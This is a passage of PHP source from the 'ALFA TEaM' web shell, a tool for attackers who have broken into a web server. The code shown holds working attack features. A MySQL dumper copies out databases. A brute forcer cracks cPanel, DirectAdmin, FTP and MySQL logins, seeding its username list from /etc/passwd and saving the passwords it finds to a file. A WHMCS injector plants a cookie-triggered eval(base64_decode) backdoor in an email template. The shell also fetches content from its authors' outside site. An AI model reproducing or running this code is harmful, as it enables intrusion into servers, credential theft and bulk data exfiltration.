!</span>");\r\n}\r\n}\r\n}elseif($_POST["alfa8"] == "color"){\r\necho(\'<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\\\'post\\\'>\');\r\necho \'<table border="1"><tbody>\';\r\n$template = \'<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>\';\r\n$x = 1;\r\nforeach($GLOBALS[\'__ALFA_COLOR__\'] as $key => $value){\r\n\t$multi = "";\r\n\tif(is_array($value)){\r\n\t\tif(isset($value["multi_selector"])){\r\n\t\t\t$multi = __ZW5jb2Rlcg(json_encode($value));\r\n\t\t}\r\n\t}\r\n\t$value = alfa_getColor($key);\r\n\t$help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));\r\n\techo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);\r\n}\r\necho \'<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>\';\r\n\r\necho \'</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\\\'importFileBtn\\\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\\\'settings\\\',null,null,null,null,null,null,null,\\\'export\\\',\\\'color\\\')" class="button"> Export </button></center></p>\';\r\nif($_POST[\'alfa7\']==\'export\'){\r\n\techo __pre();\r\n\t$colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();\r\n\t$glob_colors = $GLOBALS["__ALFA_COLOR__"];\r\n\t$array = array();\r\n\tforeach($glob_colors as $k => $v){\r\n\t\tif(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){\r\n\t\t\t$v = trim($colors[$k]);\r\n\t\t}else{\r\n\t\t\t$v = trim(is_array($v)?$v["key_color"]:$v);\r\n\t\t}\r\n\t\t$array[$k] = $v;\r\n\t}\r\n\t$file = "alfa_color_config_".date(\'Y-m-d-h_i_s\').".conf";\r\n\t$config = json_encode($array, JSON_PRETTY_PRINT);\r\n\tif(!@file_put_contents($file, $config)){\r\n\t\techo(\'<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">\'.$config.\'</textarea></center></p>\');\r\n\t}else{\r\n\t\techo(\'<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\\\'FilesTools\\\',null,\\\'\'.$file.\'\\\', \\\'download\\\')"><font color="#0F0">Download Config</font></a></center></p></h3>\');\r\n\t}\r\n}\r\nif($_POST[\'alfa2\']==\'>>\'){\r\n\techo __pre();\r\n\t$colors = json_decode($_POST["alfa1"],true);\r\n\t$array = "";\r\n\t$is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;\r\n\t$glob_colors = $GLOBALS["__ALFA_COLOR__"];\r\n\tforeach($glob_colors as $k => $v){\r\n\t\tif(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){\r\n\t\t\t$v = trim($colors[$k]);\r\n\t\t}else{\r\n\t\t\t$v = trim(is_array($v)?$v["key_color"]:$v);\r\n\t\t}\r\n\t\t$array .= \'"\'.trim($k).\'" => "\'.$v.\'",\';\r\n\t}\r\n\t@chdir($GLOBALS[\'home_cwd\']);\r\n\t$basename = @basename($_SERVER[\'PHP_SELF\']);\r\n\t$data = @file_get_contents($basename);\r\n\t$color = \'/\\\'color\\\'(.*?)\\),/s\';\r\n\tif(preg_match($color,$data,$e)){\r\n\t\t$new = "\'color\' => array(".$array."),";\r\n\t\t$data = str_replace($e[0],$new,$data);\r\n\t\tif(@file_put_contents($basename, $data)){\r\n\t\t\techo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");\r\n\t\t}else{\r\n\t\t\techo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");\r\n\t\t}\r\n\t}else{\r\n\t\techo("<center><p><h3>[-] Error...!</h3></p></center>");\r\n\t}\r\n}\r\n}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction alfaaboutus(){\r\nalfahead();\r\necho \'<div class="header">\';\r\n$news = new AlfaCURL();\r\n$about_us = $news->Send("http://solevisible.com/aboutus.php");\r\nif(empty($about_us)){\r\n$about_us = "<pre><center><img src=\'http://solevisible.com/images/farvahar-iran.png\'><br>\r\n<b><font size=\'+3\' color=\'#00A220\'>&#9774; ~ PEACE ~ &#9774;</font><br><b>\r\n<font color=\'#00A220\'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>\r\n<font color=\'#00A220\'>Contact : solevisible@gmail.com</font><br>\r\n<font color=\'#00A220\'>Telegram Channel: @solevisible</font><br>\r\n<font color=\'#FFFFFF\'>Skype : ehsan.invisible</font><br>\r\n<font color=\'#FFFFFF\'>Skype : sole.sad</font><br>\r\n<font color=\'#FF0000\'>Persian Gulf For Ever</font><br>\r\n<font color=\'#FF0000\'>Iranian Programmers</font><br>\r\n<font color=\'#FF0000\'>############</font><br>\r\n</center></pre><iframe src=\'tg://resolve?domain=solevisible\' frameborder=\'0\' width=\'0\' height=\'0\'></iframe>";\r\n}\r\necho __pre().$about_us;\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction alfacoldumper(){\r\nalfahead();\r\necho(\'<div class="header">\');\r\nAlfaNum(8,9,10);\r\necho "<center><br><div class=\'txtfont_header\'>| Mysql Column Dumper |</div><br><br>".getConfigHtml(\'all\')."<form method=\'post\' onsubmit=\\"var opt_id=this.getAttribute(\'opt_id\');var delimiter=\'json\';try{if($(\'dumper-delimiter-type\').value == \'delimiter\')delimiter=$(\'dumper-delimiter-input\').value}catch(e){};g(\'coldumper\',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\\"><p>";\r\n$delimiter = (!empty($_POST[\'alfa1\']) ? $_POST[\'alfa1\'] : \'::\');\r\n$selected_data = json_decode($_POST[\'alfa2\'], true);\r\n$username = ($_POST[\'alfa3\']);\r\n$password = ($_POST[\'alfa4\']);\r\n$dbname = ($_POST[\'alfa5\']);\r\n$dfile = ($_POST[\'alfa6\']);\r\n$host = ($_POST[\'alfa7\']);\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_host : \', \'inputName\' => \'db_host\', \'id\' => \'db_host\', \'inputValue\' => $host, \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_username : \', \'inputName\' => \'db_username\', \'id\' => \'db_user\', \'inputValue\' => $username, \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_password : \', \'inputName\' => \'db_password\', \'id\' => \'db_pw\', \'inputValue\' => $password, \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_name : \', \'inputName\' => \'db_name\', \'id\' => \'db_name\', \'inputValue\' => $dbname, \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Output Path: \', \'inputName\' => \'dfile\', \'inputValue\' => htmlspecialchars($GLOBALS[\'cwd\']), \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><input type=\'submit\' value=\' \' name=\'Submit\'></p></form></center>";\r\n$db = false;\r\nif(!empty($dbname)){\r\n\t$db = @mysqli_connect($host, $username, $password, $dbname);\r\n}\r\nif(count($selected_data) > 0){\r\n\tif($db){\r\n\t\tif(!is_dir($dfile)){\r\n\t\t\t$dfile = $GLOBALS[\'cwd\'];\r\n\t\t}\r\n\t\t$tbls = "";\r\n\t\t$ext = \'.txt\';\r\n\t\tif($delimiter == \'json\'){\r\n\t\t\t$ext = \'.json\';\r\n\t\t}\r\n\t\tforeach ($selected_data as $tbl => $cols) {\r\n\t\t\t$tables_query = mysqli_query($db, "SELECT ".implode(\',\', $cols)." FROM $tbl");\r\n\t\t\t$file_name = $dfile.\'/\'.$dbname.\'.\'.$tbl.$ext;\r\n\t\t\t$fp = fopen($file_name, "w");\r\n\t\t\t$data = array();\r\n\t\t\twhile($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){\r\n\t\t\t\tif($delimiter == "json"){\r\n\t\t\t\t\t$col_arr = array();\r\n\t\t\t\t\tforeach ($row as $key => $value) {\r\n\t\t\t\t\t\tif(empty($value)){\r\n\t\t\t\t\t\t\t$value = "[empty]";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t $col_arr[$key] = $value;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$data[$tbl][] = $col_arr;\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$data = "";\r\n\t\t\t\t\tforeach ($row as $key => $value) {\r\n\t\t\t\t\t\tif(empty($value)){\r\n\t\t\t\t\t\t\t$value = "[empty]";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t$data .= $value . $delimiter;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tfwrite($fp, $data ."\\n");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif($delimiter == "json"){\r\n\t\t\t\tfwrite($fp, json_encode($data));\r\n\t\t\t}\r\n\t\t\tfclose($fp);\r\n\t\t\t$tbls .= "Done ~~~> ".$file_name."<br>";\r\n\t\t}\r\n\t\techo __pre();\r\n\t\techo "<center><font color=\'#00FF00\'>".$tbls."</font></center>";\r\n\t}\r\n}\r\nif(!empty($dbname) && count($selected_data) == 0){\r\n//echo __pre();\r\nif($db){\r\n\techo("<hr><div style=\'text-align:center;margin-bottom:5px;font-weight:bolder;\'><span>[ Select your tables and columns for dumping data ]</span></div>");\r\n\techo("<div style=\'text-align:center;\'><span>Output Type: </span><select id=\'dumper-delimiter-type\' onchange=\'colDumplerSelectType(this);\' name=\'output_type\'><option value=\'delimiter\' selected>delimiter</option><option value=\'json\'>json</option></select><div id=\'coldumper-delimiter-input\' style=\'display:inline;\'><span> Delimiter: </span><input id=\'dumper-delimiter-input\' style=\'text-align:center;\' type=\'text\' name=\'delimiter\' placeholder=\'eg: ,\'></div></div>");\r\n\t$data = array();\r\n\t$tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");\r\n\twhile($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){\r\n\t\t$data[$row["table_name"]] = array();\r\n\t\t$table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row[\'table_name\']."`");\r\n\t\t$table_count = mysqli_fetch_row($table_count_q);\r\n\t\t$data[$row["table_name"]]["data_count"] = $table_count[0];\r\n\t\t$columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = \'".$row[\'table_name\']."\'");\r\n\t\twhile($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){\r\n\t\t\t$data[$row["table_name"]]["cols"][] = $row2["column_name"];\r\n\t\t}\r\n\t}\r\n\tmysqli_close($db);\r\n\r\n\techo \'<ul id="myUL">\';\r\n\tforeach($data as $tbl => $cols){\r\n\t    echo \'<li><span style="color:#00FF00;" class="box">\'.$tbl.\' (\'.$cols["data_count"].\')</span><ul class="nested">\';\r\n\t    foreach($cols["cols"] as $col){\r\n\t        echo \'<li tbl="\'.$tbl.\'"><span style="color:#00FF00;" tbl="\'.$tbl.\'" class="box sub-box">\' . $col . \'</span></li>\';\r\n\t    }\r\n\t    echo \'</ul></li>\';\r\n\t}\r\n\techo \'</ul>\';\r\n}else{\r\necho(\'<center>mysqli_connect : Error!</center>\');\r\n}\r\n}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction alfaDumper(){\r\nalfahead();\r\necho(\'<div class="header">\');\r\nAlfaNum(8,9,10);\r\necho "<center><br><div class=\'txtfont_header\'>| Mysql Database Dumper |</div><br><br>".getConfigHtml(\'all\')."<form method=\'post\' onsubmit=\\"g(\'dumper\',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\\"><p>";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_host : \', \'inputName\' => \'db_host\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_username : \', \'inputName\' => \'db_username\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_password : \', \'inputName\' => \'db_password\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_name : \', \'inputName\' => \'db_name\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Dump Path: \', \'inputName\' => \'dfile\', \'inputValue\' => htmlspecialchars($GLOBALS[\'cwd\']).\'alfa.sql\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><input type=\'submit\' value=\' \' name=\'Submit\'></p></form></center>";\r\n$username = ($_POST[\'alfa3\']);\r\n$password = ($_POST[\'alfa4\']);\r\n$dbname = ($_POST[\'alfa5\']);\r\n$dfile = ($_POST[\'alfa6\']);\r\n$host = ($_POST[\'alfa7\']);\r\nif(!empty($dbname)){\r\necho __pre();\r\n$msg = "<center>Check this :  <font color=\'red\'>".$dfile."</font></center>";\r\nif(@mysqli_connect($host,$username,$password,$dbname)){\r\nif(strlen(alfaEx("mysqldump"))>0){\r\nalfaEx("mysqldump --single-transaction --host=\\"$host\\" --user=\\"$username\\" --password=\\"$password\\" $dbname > \'".addslashes($dfile)."\'");\r\necho($msg);\r\n}else{\r\n__alert("Error...!");\r\n}\r\n}else{\r\necho(\'<center>mysqli_connect : Error!</center>\');\r\n}\r\n}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction Alfa_DirectAdmin_Cracker($info){\r\nif(!$info[\'mysql\'])\r\n$url = $info[\'protocol\'].$info[\'target\'].\':\'.$info[\'port\'].\'/CMD_LOGIN\';\r\nelse $url = $info[\'protocol\'].$info[\'target\'].\'/phpmyadmin\';\r\n$curl = curl_init();\r\ncurl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);\r\ncurl_setopt($curl, CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\');\r\ncurl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);\r\ncurl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);\r\ncurl_setopt($curl, CURLOPT_HEADER,0);\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl, CURLOPT_URL,$url);\r\ncurl_setopt($curl, CURLOPT_USERPWD, $info[\'username\'].\':\'.$info[\'password\']);\r\nif($info[\'mysql\'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);\r\n$result = @curl_exec($curl);\r\n$curl_errno = curl_errno($curl);\r\n$curl_error = curl_error($curl);\r\nif ($curl_errno > 0) {echo "<font color=\'red\'>Error: $curl_error</font><br>";}\r\nelseif(preg_match(\'/CMD_FILE_MANAGER|frameset/i\',$result)){\r\necho \'UserName: <font color="red">\'.$info[\'username\'].\'</font> PassWord: <font color="red">\'.$info[\'password\'].\'</font><font color="green">  Login Success....</font><br>\';\r\n$info[\'target\'] = $url;\r\nCrackerResualt($info);\r\n}\r\ncurl_close($curl);\r\n}\r\nfunction Alfa_CP_Cracker($info){\r\n$url = $info[\'protocol\'].$info[\'target\'].\':\'.$info[\'port\'];\r\n$curl = curl_init();\r\ncurl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);\r\ncurl_setopt($curl, CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\');\r\ncurl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);\r\ncurl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);\r\ncurl_setopt($curl, CURLOPT_HEADER,0);\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\ncurl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info[\'username\'].":".$info[\'password\']) . "\\n\\r"));\r\ncurl_setopt($curl, CURLOPT_URL, $url);\r\n$result = @curl_exec($curl);\r\n$curl_errno = curl_errno($curl);\r\n$curl_error = curl_error($curl);\r\nif ($curl_errno > 0) {echo "<font color=\'red\'>Error: $curl_error</font><br>";}\r\nelseif(preg_match(\'/filemanager/i\',$result)){\r\necho \'UserName: <font color="red">\'.$info[\'username\'].\'</font> PassWord: <font color="red">\'.$info[\'password\'].\'</font><font color="green">  Login Success....</font><br>\';\r\n$info[\'target\'] = $url;\r\nCrackerResualt($info);\r\n}\r\ncurl_close($curl);\r\n}\r\nfunction Alfa_FTP_Cracker($info){\r\n$url = $info[\'protocol\'].$info[\'target\'];\r\n$curl = curl_init();\r\ncurl_setopt($curl, CURLOPT_URL, $url);\r\ncurl_setopt($curl, CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\');\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl, CURLOPT_USERPWD, "".$info[\'username\'].":".$info[\'password\']."");\r\n$result = @curl_exec($curl);\r\n$curl_errno = curl_errno($curl);\r\n$curl_error = curl_error($curl);\r\nif ($curl_errno > 0) {echo "<font color=\'red\'>Error: $curl_error</font><br>";}\r\nelseif(preg_match(\'/(\\d+):(\\d+)/i\',$result)){\r\necho \'UserName: <font color="red">\'.$info[\'username\'].\'</font> PassWord: <font color="red">\'.$info[\'password\'].\'</font><font color="green">  Login Success....</font><br>\';\r\n$info[\'target\'] = $url;\r\nCrackerResualt($info);\r\n}\r\ncurl_close($curl);\r\n}\r\nfunction Alfa_Mysql_Cracker($info){\r\nif(@mysqli_connect($info[\'target\'].\':\'.$info[\'port\'],$info[\'username\'],$info[\'password\'])){\r\nCrackerResualt($info);\r\necho \'UserName: <font color="red">\'.$info[\'username\'].\'</font> PassWord: <font color="red">\'.$info[\'password\'].\'</font><font color="green">  Login Success....</font><br>\';\r\n}\r\n}\r\nfunction Alfa_FTPC($info){\r\nif($con=@ftp_connect($info[\'target\'],$info[\'port\'])){\r\nif($con){\r\n$login=@ftp_login($con,$info[\'username\'],$info[\'password\']);\r\nif($login){CrackerResualt($info);}}}\r\n@ftp_close($con);\r\n}\r\nfunction CrackerResualt($info){\r\n$res = $info[\'target\'].\' => \'.$info[\'username\'].":".$info[\'password\']."\\n" ;\r\n$c = @fopen($info[\'fcrack\'],\'a+\');\r\n@fwrite($c, $res);\r\n@fclose($c);\r\n}\r\nfunction Alfa_Call_Function_Cracker($method,$info){\r\nswitch($method){case \'cp\':return Alfa_CP_Cracker($info);break;case \'direct\': case \'phpmyadmin\':return Alfa_DirectAdmin_Cracker($info);break;case \'ftp\':return Alfa_FTP_Cracker($info);break;case \'mysql\':return Alfa_Mysql_Cracker($info);break;case \'mysql\':return Alfa_FTPC($info);break;}\r\n}\r\nfunction alfaCrackers(){\r\nalfahead();\r\nAlfaNum(9,10);\r\necho \'<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\\\'Crackers\\\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\\\'start\\\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">\';\r\nforeach(array(\'cp\'=>\'Cpanel\',\'direct\'=>\'DirectAdmin\',\'ftp\'=>\'FTP\',\'phpmyadmin\'=>\'PhpMyAdmin[DirectAdmin]\',\'mysql\'=>\'mysql_connect()\',\'ftpc\'=>\'ftp_connect()\') as $key=>$val)echo(\'<option value="\'.$key.\'">\'.$val.\'</option>\');\r\necho \'</select> Protocol: <select id="protocol" name="protocol">\';\r\nforeach(array(\'https://\',\'http://\',\'ftp://\') as $val)echo(\'<option value="\'.$val.\'">\'.$val.\'</option>\');\r\necho \'</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">\r\nPort: <input id="port" type="text" name="port" value="2083">\r\n<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>\r\n<textarea placeholder="Users" rows="20" cols="25" name="usernames">\'.($GLOBALS[\'sys\']==\'unix\'?alfaEx("cut -d: -f1 /etc/passwd"):"").\'</textarea>\r\n&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>\r\nSave Result Into File <input type="text" name="fcrack" value="cracked.txt">\r\n<p><input type="submit" name="cracking" value=" " /></div></form></p><center>\';\r\n$target = str_replace(array(\'https://\',\'http://\',\'ftp://\'),\'\',$_POST[\'alfa1\']);\r\n$port = $_POST[\'alfa2\'];\r\n$usernames= $_POST[\'alfa3\'];\r\n$passwords = $_POST[\'alfa4\'];\r\n$fcrack = $_POST[\'alfa5\'];\r\n$cracking = $_POST[\'alfa6\'];\r\n$protocol = $_POST[\'alfa7\'];\r\n$loginpanel = $_POST[\'alfa8\'];\r\n$p = $loginpanel == \'phpmyadmin\' ? $p = true : false;\r\nif($cracking==\'start\'){\r\necho __pre();\r\n$exuser = explode("\\n",$usernames);\r\n$expw = explode("\\n",$passwords);\r\nforeach($exuser as $user){\r\nforeach($expw as $pw){\r\n$array = array(\'username\' => trim($user),\'password\' => trim($pw),\'port\' => trim($port),\'target\' => trim($target),\'protocol\' => trim($protocol),\'fcrack\' => trim($fcrack),\'mysql\' => $p);\r\nAlfa_Call_Function_Cracker($loginpanel,$array);\r\n}\r\n}\r\necho \'<br><font color="red">Attack Finished...</font>\';\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction output($string){ echo "<br><pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><center><font color=red><a target=\'_blank\' href=\'".$string."\'>Click Here !</a></font></b></center><br><br>";}\r\nfunction alfaShellInjectors(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nAlfaNum(11);\r\necho \'<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\\\'ShellInjectors\\\',null,\\\'whmcs\\\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\\\'ShellInjectors\\\',null,null,\\\'mybb\\\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\\\'ShellInjectors\\\',null,null,null,\\\'vb\\\')">| vBulletin |</a></h3></center>\';\r\n$selector = \'<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>\';\r\nif(isset($_POST[\'alfa1\']) && $_POST[\'alfa1\']== \'whmcs\'){\r\nAlfaNum();\r\necho __pre()."<p><div class=\'txtfont_header\'>| WHMCS |</div></p><center><center><p>".getConfigHtml(\'whmcs\')."</p><form onSubmit=\\"g(\'ShellInjectors\',null,\'whmcs\',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\\" method=\'post\'>";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Path WHMCS Url : \', \'inputName\' => \'path\', \'inputValue\' => \'http://site.com/whmcs\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host : \', \'inputName\' => \'dbh\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name : \', \'inputName\' => \'dbn\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User : \', \'inputName\' => \'dbu\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass : \', \'inputName\' => \'dbp\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho $selector;\r\necho "<p><input type=\'submit\' value=\' \'></p></form></center></td></tr></table></center>";\r\nif(isset($_POST[\'alfa6\'])) {\r\n$dbu = $_POST[\'alfa6\'];\r\n$dbn = $_POST[\'alfa7\'];\r\n$dbp = $_POST[\'alfa8\'];\r\n$dbh = $_POST[\'alfa9\'];\r\n$path = $_POST[\'alfa10\'];\r\n$method = $_POST[\'alfa4\'];\r\n$index = "{php}".ALFA_UPLOADER.";{/php}";\r\n$newin = str_replace("\'","\\\'",$index);\r\n$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\\"{\\$pw_reset_url}\\">{\\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\\$signature}</p>{php}if(\\$_COOKIE[\\"sec\\"] == \\"123\\"){eval(base64_decode(\\$_COOKIE[\\"sec2\\"])); die(\\"!\\");}{\\/php}";\r\nif(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){\r\nif(filter_var($path,FILTER_VALIDATE_URL)){\r\n$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());\r\n$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name=\'Password Reset Validation\'");\r\n$soleGet = mysqli_fetch_assoc($soleSave);\r\n$tempSave1 = $soleGet[\'message\'];\r\n$tempSave = str_replace("\'","\\\'",$tempSave1);\r\nmysqli_query($conn,"UPDATE tblconfiguration SET value = \'1\' WHERE setting = \'AllowSmartyPhpTags\'") or die (mysqli_error($conn));\r\n$inject = "UPDATE tblemailtemplates SET message=\'$newindex\' WHERE name=\'Password Reset Validation\'";\r\n$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));\r\n$create = "insert into tblclients (email) values(\'solevisible@fbi.gov\')";\r\n$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));\r\nif(function_exists(\'curl_version\') && $method == \'auto\'){\r\n$AlfaSole = new AlfaCURL(true);\r\n$saveurl = $AlfaSole->Send($path."/pwreset.php");\r\n$getToken = preg_match("/name=\\"token\\" value=\\"(.*?)\\"/i",$saveurl,$token);\r\n$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");\r\n$backdata = "UPDATE tblemailtemplates SET message=\'{$tempSave}\' WHERE name=\'Password Reset Validation\'";\r\n$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));\r\n__alert("shell injectet...");\r\n$ff= \'http://\'.$path."/solevisible.php";\r\noutput($ff);}else{\r\necho "<br><pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><center><b><font color=\\"#FFFFFF\\">Please go to Target => </font><a href=\'".$path."/pwreset.php\' target=\'_blank\'>".$path."/pwreset.php</a><br/><font color=\'#FFFFFF\'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\'#FFFFFF\'>And Go To => </font><a href=\'".$path."/solevisible.php\' target=\'_blank\'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert(\'Path is not Valid...\');}}}\r\n}if(isset($_POST[\'alfa2\']) && $_POST[\'alfa2\']== \'mybb\'){\r\nAlfaNum(1,2,3,5);\r\necho __pre()."<p><div class=\'txtfont_header\'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id=\'sendajax\' onSubmit=\\"g(\'ShellInjectors\',null,null,\'mybb\',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\\" method=POST>\r\n";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Host : \', \'inputName\' => \'dbh\', \'id\'=>\'db_host\',\'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'DataBase Name : \', \'inputName\' => \'dbn\', \'id\'=>\'db_name\' ,\'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'User Name : \', \'inputName\' => \'dbu\', \'id\'=>\'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Password : \', \'inputName\' => \'dbp\', \'id\'=>\'db_pw\', \'inputValue\' => \'\', \'inputSize\' => 